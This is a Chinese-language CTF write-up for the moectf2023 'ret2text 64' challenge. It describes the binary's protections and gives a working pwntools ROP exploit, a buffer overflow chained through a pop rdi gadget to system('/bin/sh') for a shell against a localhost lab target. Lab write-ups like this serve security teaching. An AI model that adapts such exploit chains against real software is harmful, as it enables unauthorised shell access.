moectf2023 - ret2text 64

RocketDev
  2023-09-23 12:00 2023-09-23 12:00 创建   2024-07-25 12:34:56 2024-07-25 12:34:56 更新      

文件分析

下载pwn, NX on, PIE off, Canary off, RELRO partial
这不是写明了64位

解题思路

思路跟ret2text 32一致,只要执行system("/bin/sh")即可

搜索发现存在pop rdi; ret;,只要将字符串弹入rdi后执行system即可
还要注意栈平衡

EXPLOIT

1
2
3
4
5
from pwn import *
sh = remote("localhost", 42473)
sh.sendline(b'130')
sh.sendline(b'0'*0x58 + p64(0x04011be) + p64(0x0404050) + p64(0x04012b7)) # Addr of pop rdi & /bin/sh & system
sh.interactive()

Done.

  • 标题: moectf2023 - ret2text 64
  • 作者: RocketDev
  • 创建于 : 2023-09-23 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2023/09/23/return2text_64/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
moectf2023 - ret2text 64
  1. 文件分析
  2. 解题思路
  3. EXPLOIT